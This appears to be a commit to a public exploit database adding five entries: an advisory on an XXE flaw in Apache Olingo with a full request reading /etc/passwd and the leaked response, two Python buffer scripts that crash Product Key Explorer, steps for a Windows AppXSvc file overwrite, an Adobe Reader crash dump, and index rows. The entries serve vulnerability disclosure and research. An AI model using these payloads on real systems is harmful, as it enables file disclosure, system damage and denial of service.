DB: 2019-12-12

5 changes to exploits/shellcodes Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC) Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC) AppXSvc 17763 - Arbitrary File Overwrite (DoS) Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font Apache Olingo OData 4.0 - XML External Entity Injection
2019-12-12 05:01:58 +00:00 · 2019-12-12 05:01:58 +00:00 · 6cf35b330f
commit 6cf35b330f
parent 09d5da74fb
6 changed files with 354 additions and 0 deletions
--- a/exploits/java/webapps/47770.txt
+++ b/exploits/java/webapps/47770.txt
@ -0,0 +1,121 @@
+#############################################################
+#
+# COMPASS SECURITY ADVISORY
+# https://www.compass-security.com/research/advisories/
+#
+#############################################################
+#
+# Product:  Apache Olingo OData 4.0
+# Vendor:   Apache Foundation
+# CSNC ID:  CSNC-2009-025
+# CVE ID:   CVE-2019-17554
+# Subject:  XML External Entity Resolution (XXE)
+# Risk:     High
+# Effect:   Remotely exploitable
+# Author:   Archibald Haddock (advisories@compass-security.com)
+# Date:     08.11.2019
+#
+#############################################################
+
+Introduction:
+-------------
+Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
+XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].
+
+
+
+Affected:
+---------
+Vulnerable:
+ * Olingo OData 4.x.x to 4.6.x
+
+Not vulnerable:
+ * Olingo OData 4.7.0
+ * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
+
+Technical Description
+---------------------
+The XML content type entity deserializer is not configured to deny the resolution of external entities.
+Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
+
+Request
+======
+POST /odata-server-sample/cars.svc/Cars HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost:8081/odata-server-sample/
+Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
+Upgrade-Insecure-Requests: 1
+content-type: application/xml
+Content-Length: 1101
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
+  <a:id>Cars(1)</a:id>
+  <a:title></a:title>
+  <a:summary></a:summary>
+  <a:updated>2019-11-08T15:10:30Z</a:updated>
+  <a:author>
+    <a:name></a:name>
+  </a:author>
+  <a:link rel="edit" href="Cars(1)"></a:link>
+  <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
+  <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
+  <a:content type="application/xml">
+    <m:properties>
+      <d:Id m:type="Int16">1</d:Id>
+      <d:Model>F1 &xxe;</d:Model>
+      <d:ModelYear>2012</d:ModelYear>
+      <d:Price m:type="Decimal">189189.43</d:Price>
+      <d:Currency>EUR</d:Currency>
+    </m:properties>
+  </a:content>
+</a:entry>
+
+Response
+========
+HTTP/1.1 201 Created
+Server: Apache-Coyote/1.1
+OData-Version: 4.0
+Content-Type: application/xml
+Content-Length: 960
+Date: Fri, 08 Nov 2019 14:22:35 GMT
+Connection: close
+
+<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
+myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
+</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>
+
+
+Workaround / Fix:
+-----------------
+Configure the XML reader securely [3].
+
+In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
+private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
+
+The XMLInputFactory should be configured, not to resolve external entities:
+FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
+
+
+Timeline:
+---------
+2019-11-08:     Discovery by Compass Security
+2019-11-08:     Initial vendor notification
+2019-11-08:     Initial vendor response
+2019-12-04:     Release of fixed Version / Patch [4]
+2019-12-05:     Coordinated public disclosure date
+
+
+[1] https://olingo.apache.org/
+[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
+[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
+
+Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
--- a/exploits/windows/dos/47766.py
+++ b/exploits/windows/dos/47766.py
@ -0,0 +1,47 @@
+# Exploit Title: Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)
+# Discovery by: SajjadBnd
+# Date: 2019-12-10
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+ 
+# [ About App ]
+ 
+# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
+# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
+# Visit "Features" page to see all supported software list of programs with which product key finder works.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# Product key Explorer recovers product keys for software installed on your
+# local and network computers, allows track the number of software licenses installed in your business.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
+# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
+ 
+
+# [ POC ]
+ 
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 100
+buffer += "\x42" * 100
+buffer += "\x43" * 58
+try:
+    f = open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/exploits/windows/dos/47767.py
+++ b/exploits/windows/dos/47767.py
@ -0,0 +1,47 @@
+# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
+# Discovery by: SajjadBnd
+# Date: 2019-12-10
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+ 
+# [ About App ]
+ 
+# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
+# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
+# Visit "Features" page to see all supported software list of programs with which product key finder works.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# Product key Explorer recovers product keys for software installed on your
+# local and network computers, allows track the number of software licenses installed in your business.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
+# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
+ 
+
+# [ POC ]
+ 
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 100
+buffer += "\x42" * 100
+buffer += "\x43" * 58
+try:
+    f = open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/exploits/windows/dos/47768.txt
+++ b/exploits/windows/dos/47768.txt
@ -0,0 +1,45 @@
+# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
+# Date: 2019-10-28
+# Exploit Author: Gabor Seljan
+# Vendor Homepage: https://www.microsoft.com/
+# Version: 17763.1.amd64fre.rs5_release.180914-1434
+# Tested on: Windows 10 Version 1809 for x64-based Systems
+# CVE: CVE-2019-1476
+
+# Summary:
+# AppXSvc improperly handles file hard links resulting in a low privileged user
+# being able to overwrite an arbitrary file leading to elevation of privilege.
+
+# Description:
+
+# An elevation of privilege vulnerability exists when the AppX Deployment Server
+# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
+# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
+# to overwrite an arbitrary file by deleting all registry data files before
+# creating the file hard link. As Nabeel Ahmed described in his write-up of
+# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
+# the original settings.dat template. However, additional settings.dat.LOG1 and
+# settings.dat.LOG2 files are also created during the initialization process.
+# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
+# link allows a low privileged user to overwrite an arbitrary file with registry
+# data or just simply empty it, respectively. A low privileged user could exploit
+# this vulnerability to cause denial of service by overwriting critical system
+# files.
+
+Steps to reproduce:
+1. Terminate Paint 3D processes.
+2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder.
+3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
+4. Execute the start ms-paint: command to run Paint 3D.
+5. Terminate Paint 3D processes.
+
+Expected result:
+It isn't possible to overwrite a file not writable by a low privileged user.
+
+Observed result:
+C:\Windows\win.ini file is overwritten with registry data.
+
+References:
+https://github.com/sgabe/CVE-2019-1476
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476
+https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
--- a/exploits/windows/dos/47769.txt
+++ b/exploits/windows/dos/47769.txt
@ -0,0 +1,89 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34
+eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0         nv up ei pl nz ac po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
+CoolType!CTInit+0x3913e:
+10e6c29e 8902            mov     dword ptr [edx],eax  ds:002b:707703a4=31a03194
+
+0:000> u @eip-14
+CoolType!CTInit+0x3912a:
+10e6c28a 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
+10e6c28d 8b571c          mov     edx,dword ptr [edi+1Ch]
+10e6c290 8b7720          mov     esi,dword ptr [edi+20h]
+10e6c293 035508          add     edx,dword ptr [ebp+8]
+10e6c296 8b4724          mov     eax,dword ptr [edi+24h]
+10e6c299 037508          add     esi,dword ptr [ebp+8]
+10e6c29c 03c6            add     eax,esi
+10e6c29e 8902            mov     dword ptr [edx],eax
+
+0:000> ? poi(edi+1c)
+Evaluate expression: -690332 = fff57764
+
+0:000> ? poi(ebp+8)
+Evaluate expression: 1887538240 = 70818c40
+
+0:000> !heap -p -a 70818c40
+    address 70818c40 found in
+    _DPH_HEAP_ROOT @ bfc1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                723d3b94:         70818c40            173c0 -         70818000            19000
+          unknown!fillpattern
+    0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+    77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+    77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+    77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+    77e7ccee ntdll!RtlAllocateHeap+0x0000003e
+    0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+    77c2f1f6 ucrtbase!_malloc_base+0x00000026
+    5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9
+    10e37991 CoolType!CTInit+0x00004831
+    10e38e1b CoolType!CTInit+0x00005cbb
+    10e68870 CoolType!CTInit+0x00035710
+    10e683dc CoolType!CTInit+0x0003527c
+    10e67d25 CoolType!CTInit+0x00034bc5
+    10e65902 CoolType!CTInit+0x000327a2
+    10e633f2 CoolType!CTInit+0x00030292
+    10e62719 CoolType!CTInit+0x0002f5b9
+    10e620e8 CoolType!CTInit+0x0002ef88
+    10e62000 CoolType!CTInit+0x0002eea0
+    108f36f1 AGM!AGMInitialize+0x0002a881
+
+ 
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e
+01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82
+02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6
+03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87
+04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef
+05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750
+06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99
+07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac
+08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292
+09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9
+0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88
+0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0
+0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881
+0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce
+0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197
+0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c
+--- cut ---
+
+Notes:
+
+- The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability.
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case).
+
+- Attached samples: poc[1-4].pdf (crashing files).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47769.zip
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6617,6 +6617,10 @@ id,file,description,date,author,type,platform,port
 47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
 47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
 47757,exploits/hardware/dos/47757.py,"Omron PLC 1.0.0 - Denial of Service (PoC)",2019-12-09,n0b0dy,dos,hardware,
+47766,exploits/windows/dos/47766.py,"Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)",2019-12-11,SajjadBnd,dos,windows,
+47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows,
+47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
+47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42075,3 +42079,4 @@ id,file,description,date,author,type,platform,port
 47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
 47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
 47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
+47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,